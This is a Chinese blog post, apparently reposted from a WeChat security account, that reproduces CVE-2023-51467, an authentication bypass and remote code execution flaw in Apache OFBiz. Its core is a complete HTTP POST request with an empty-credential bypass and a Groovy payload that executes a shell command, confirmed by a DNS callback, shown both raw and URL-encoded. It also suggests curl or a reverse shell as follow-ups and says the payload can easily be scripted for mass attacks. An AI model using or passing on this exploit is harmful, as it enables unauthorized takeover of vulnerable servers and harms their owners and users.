CVE-2023-51467__Apache OFBiz-RCE__手工复现

admin 2024年1月3日23:04:22评论60 views字数 1181阅读3分56秒阅读模式


CVE-2023-51467__Apache OFBiz-RCE__手工复现  

            

Apache OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。  

            

CVE-2023-51467


漏洞描述:

        Apache OFBiz 在后台提供了执行groovy 代码的功能,但是由于存在认证绕过问题,攻击者可构造恶意请求绕过身份认证,利用后台相关接口功能执行groovy代码,执行任意命令,控制服务器。

 

影响版本:

Apache OFBiz <= 18.12.11

 

漏洞复现: 

   

这里测试不编码也可以正常利用。

POST /webtools/control/ProgramExport?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1Host: xxxxxxCookie: JSESSIONID=BF77472F4A16EF66171A3FB075712EF2.jvm1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 150 groovyProgram=import+groovy.lang.GroovyShell GroovyShell+shell+=+new+GroovyShell();shell.evaluate('"ping xxxx.org".execute()')

编码的Payload

groovyProgram=import+groovy.lang.GroovyShell%0D%0A%0D%0AGroovyShell+shell+%3D+new+GroovyShell%28%29%3B%0D%0Ashell.evaluate%28%27%22ping+ dnslog.cn%22.execute%28%29%27%29

          

CVE-2023-51467__Apache OFBiz-RCE__手工复现

Web响应界面,小阿三

CVE-2023-51467__Apache OFBiz-RCE__手工复现

DNSLog

CVE-2023-51467__Apache OFBiz-RCE__手工复现

利用思路举例:


Curl或反弹shell等

CVE-2023-51467__Apache OFBiz-RCE__手工复现

可以上号!不做示范了

CVE-2023-51467__Apache OFBiz-RCE__手工复现

1.该漏洞网上大佬分析的很详细,需要可以看一下。

2.Payload很简单就可以写成脚本就行批量攻击。注意防护,自已人不打自已人。

 

              

原文始发于微信公众号(YongYe 安全实验室):CVE-2023-51467__Apache OFBiz-RCE__手工复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月3日23:04:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-51467__Apache OFBiz-RCE__手工复现http://cn-sec.com/archives/2350426.html

发表评论

匿名网友 填写信息